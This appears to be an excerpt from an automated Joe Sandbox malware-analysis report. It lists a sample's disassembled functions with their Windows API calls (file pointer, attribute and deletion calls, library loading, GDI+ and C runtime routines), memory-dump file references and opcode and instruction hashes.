                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D79ADC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$BuffersFlushTime
                                                                                      • String ID:
                                                                                      • API String ID: 1392018926-0
                                                                                      • Opcode ID: 945dc72baf1813494cafc0e5b47fe1f849d7452ae7fce4f6be2e0acf052c66e3
                                                                                      • Instruction ID: db38a069ef63447dc5e58df3e6d628419cee51c72173df7fc70d867e2606d806
                                                                                      • Opcode Fuzzy Hash: 945dc72baf1813494cafc0e5b47fe1f849d7452ae7fce4f6be2e0acf052c66e3
                                                                                      • Instruction Fuzzy Hash: 7121E432149341AFC711DB24C8A1AAAFBD4AF56704F08891CF8D9C7191E729ED0CC771
                                                                                      Function 00D79AEB Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D79B21
                                                                                      • GetLastError.KERNEL32 ref: 00D79B2D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: 94daa6eb8a36a10e022305be31ce4a42c3ac1773311e9b5e00ca2e73e6abf1e6
                                                                                      • Instruction ID: 90e7702843b4fe64ea87c5d74c6afb0bb551878bcd39a421f745f76955623034
                                                                                      • Opcode Fuzzy Hash: 94daa6eb8a36a10e022305be31ce4a42c3ac1773311e9b5e00ca2e73e6abf1e6
                                                                                      • Instruction Fuzzy Hash: 700192727057046BDB349E29EC95766F7D99B85324F14C53EB15AC3680EA31E8088631
                                                                                      Function 00D79897 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00D798EB
                                                                                      • GetLastError.KERNEL32 ref: 00D798F8
                                                                                        • Part of subcall function 00D796AA: __EH_prolog.LIBCMT ref: 00D796AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileH_prologLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 4236474358-0
                                                                                      • Opcode ID: 33c8fa08b30bb147ff5f97f5118c6cbdf935f9e5ade164f884e158ae1e22517f
                                                                                      • Instruction ID: eaaac553936fa8ff06a305632c992f82e21701ef3516c4b98d6a23637d33100c
                                                                                      • Opcode Fuzzy Hash: 33c8fa08b30bb147ff5f97f5118c6cbdf935f9e5ade164f884e158ae1e22517f
                                                                                      • Instruction Fuzzy Hash: 6F01B5376002059BDB188E598C645AAF759EF47330718C36EE92ECB390E730DC018B71
                                                                                      Function 00D95AEA Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00D95B0B
                                                                                        • Part of subcall function 00D959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      • RtlReAllocateHeap.NTDLL(00000000,?,00200000,?,?,00DACBE8,00D717A1,?,?,?,?,00000000,?,00D71378,?,?), ref: 00D95B47
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap$_free
                                                                                      • String ID:
                                                                                      • API String ID: 1482568997-0
                                                                                      • Opcode ID: cd23a84d4ae38a36b44328931e99e9584f81eb10c27d5d1b357caff3908b7f6c
                                                                                      • Instruction ID: 43e14c07c72de2a8ab2ecbe72cba511eee745acae1d8f9c39a60604e41129807
                                                                                      • Opcode Fuzzy Hash: cd23a84d4ae38a36b44328931e99e9584f81eb10c27d5d1b357caff3908b7f6c
                                                                                      • Instruction Fuzzy Hash: B3F06232701A15A6DF333E25BC01F6A375CDF91775B184135F868961A9DA30CC0187B1
                                                                                      Function 00D7D142 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 00D7D187
                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 00D7D19D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: 4797881131b1e643516a40a0ca442e017c83e0c7e269fbde601017624883023c
                                                                                      • Instruction ID: a3165ad3e7b78834f9165c483fd9e02165506351162edffe3989dfa82131cec9
                                                                                      • Opcode Fuzzy Hash: 4797881131b1e643516a40a0ca442e017c83e0c7e269fbde601017624883023c
                                                                                      • Instruction Fuzzy Hash: D5F0C8327213287FDA115F50AC45FA77A59EF063A0F011925FA88D6261E6264C01C7B0
                                                                                      Function 00D7FCA6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00D7FCB3
                                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D7FCBA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                      • String ID:
                                                                                      • API String ID: 1231390398-0
                                                                                      • Opcode ID: 0d15bcbde3331c8d05fd53d18bbfc285e945bafa45818f1a448bae5e773d0aff
                                                                                      • Instruction ID: 81281f116e60ab2f9aea6a058bcd845f5965ecbe43607f5b2e0425d60eefcd71
                                                                                      • Opcode Fuzzy Hash: 0d15bcbde3331c8d05fd53d18bbfc285e945bafa45818f1a448bae5e773d0aff
                                                                                      • Instruction Fuzzy Hash: 48E09232E1020E678F2A8BA89C859EF779DEA45300728C17EED4ED3600FA34DD4147B4
                                                                                      Function 00D7A0C3 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D79EF9,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D7A0D7
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D79EF9,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D7A108
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: d785c83097a78ba3face53a98a31a6dc1504b5a3cf94d37cbfceb58b52220aa6
                                                                                      • Instruction ID: bed9a6cc057241ba9a07be08ed64a9a912a23f08d8352494fdc972fc6bc6cef8
                                                                                      • Opcode Fuzzy Hash: d785c83097a78ba3face53a98a31a6dc1504b5a3cf94d37cbfceb58b52220aa6
                                                                                      • Instruction Fuzzy Hash: 8CF0A031280209BBEF116F64EC01BDE7B6DEB04381F44C061BD88C6161EB329A989B74
                                                                                      Function 00D8C0D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText_swprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3011073432-0
                                                                                      • Opcode ID: 0ad54ec6e2e55a697fa37d3a15ad5626923c3a429d3e1afc92041ade2eeb6401
                                                                                      • Instruction ID: 384c82cdca94da99ec00bbefab885f9de54d5ac90a163071c0eed8d8aa9e99fb
                                                                                      • Opcode Fuzzy Hash: 0ad54ec6e2e55a697fa37d3a15ad5626923c3a429d3e1afc92041ade2eeb6401
                                                                                      • Instruction Fuzzy Hash: 3EF0EC32964348F6E711B7A09C06FA93B5DEB043C1F044196F605D21A2E6715A209772
                                                                                      Function 00D79DAC Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00D79611,?,?,00D7946C), ref: 00D79DBD
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D79611,?,?,00D7946C), ref: 00D79DEB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 04594b4788f6ad4580482d99dd4029d2685507dfc2f226ef7b0598ca5634009c
                                                                                      • Instruction ID: 076dd94fed8f168f5a368fdae09b900e674b80dfcf98a26c1d7e2d0ad3c801c1
                                                                                      • Opcode Fuzzy Hash: 04594b4788f6ad4580482d99dd4029d2685507dfc2f226ef7b0598ca5634009c
                                                                                      • Instruction Fuzzy Hash: B7E09B3165120D67DB215F61DC41BDA779DEB09382F844061BA48C2154EB319D949A74
                                                                                      Function 00D79E13 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00D79E08,?,00D775A0,?,?,?,?), ref: 00D79E24
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D79E08,?,00D775A0,?,?,?,?), ref: 00D79E50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 71dd232d3c052d0577329577e1b536232b4137f913fa13bb8044239ee77fef46
                                                                                      • Instruction ID: 1c795ac19ee5ee740c56a6de27a42ac4d65155daf91be55c88061579f397cb45
                                                                                      • Opcode Fuzzy Hash: 71dd232d3c052d0577329577e1b536232b4137f913fa13bb8044239ee77fef46
                                                                                      • Instruction Fuzzy Hash: A0E0653250125867CB11AA68DC05BDABB58DB097B1F044161FD48E3290D6705D8487F4
                                                                                      Function 00D7F309 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7F324
                                                                                      • LoadLibraryW.KERNELBASE(?,?,00D7DEC8,Crypt32.dll,?,00D7DF4A,?,00D7DF2E,?,?,?,?), ref: 00D7F346
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1175261203-0
                                                                                      • Opcode ID: 9ddd74962cccc595675d56d11c6193d10c3d88868455998fff08c2f78e8e4db0
                                                                                      • Instruction ID: dd039f20b99000380a15243c2acbd057d52cd49559a19c397bcdb8e96fb72e0a
                                                                                      • Opcode Fuzzy Hash: 9ddd74962cccc595675d56d11c6193d10c3d88868455998fff08c2f78e8e4db0
                                                                                      • Instruction Fuzzy Hash: B2E01272811218ABDB11ABA4DC05FEB7B6CEB093D1F0440A6B948D2105DA74D9408BB4
                                                                                      Function 00D88924 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D88945
                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D8894C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: BitmapCreateFromGdipStream
                                                                                      • String ID:
                                                                                      • API String ID: 1918208029-0
                                                                                      • Opcode ID: 0099e471468b34c235eb2f02838c33d93cf27ac3613b0fde1beaed965040f864
                                                                                      • Instruction ID: 8d756c2ade3ccc623a4749dfa01474e85078996c823fc305654f326bc4d2a079
                                                                                      • Opcode Fuzzy Hash: 0099e471468b34c235eb2f02838c33d93cf27ac3613b0fde1beaed965040f864
                                                                                      • Instruction Fuzzy Hash: D9E0E575515218EFCB50FF95D5017A9B7E8EB05351F10846AE84593701D670AE04ABB1
                                                                                      Function 00D8909E Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,00D9F79B,000000FF), ref: 00D890C7
                                                                                      • CoUninitialize.COMBASE(?,?,?,00D9F79B,000000FF), ref: 00D890CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: GdiplusShutdownUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 3856339756-0
                                                                                      • Opcode ID: 6b5e371c746b1e15f9d12121060072cbc5c50d4ccabf5ced5dc37b7444047d30
                                                                                      • Instruction ID: fa7de842bc1960154df3ff0503cb46e19c3980d36273128a753a339382e2e49a
                                                                                      • Opcode Fuzzy Hash: 6b5e371c746b1e15f9d12121060072cbc5c50d4ccabf5ced5dc37b7444047d30
                                                                                      • Instruction Fuzzy Hash: 51E01A32548644DFC710EB8CDD45B55BBE9FB09B20F008769B81AC3B60CB386844CBA1
                                                                                      Function 00D90CA6 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D91D9A: try_get_function.LIBVCRUNTIME ref: 00D91DAF
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D90CC4
                                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D90CCF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                      • String ID:
                                                                                      • API String ID: 806969131-0
                                                                                      • Opcode ID: bf06b7bb78a9771af71f7212e9ca236e4bb1192f7f90599c48c421a0b0d00f2b
                                                                                      • Instruction ID: 4a851211b14560ebc727343ff76fe1f06948e512a0f973e85bdcd50be2faa502
                                                                                      • Opcode Fuzzy Hash: bf06b7bb78a9771af71f7212e9ca236e4bb1192f7f90599c48c421a0b0d00f2b
                                                                                      • Instruction Fuzzy Hash: A1D0233D5483072C1F0033753C1255B2F44D502BF47700345F021D51C1DF108045D173
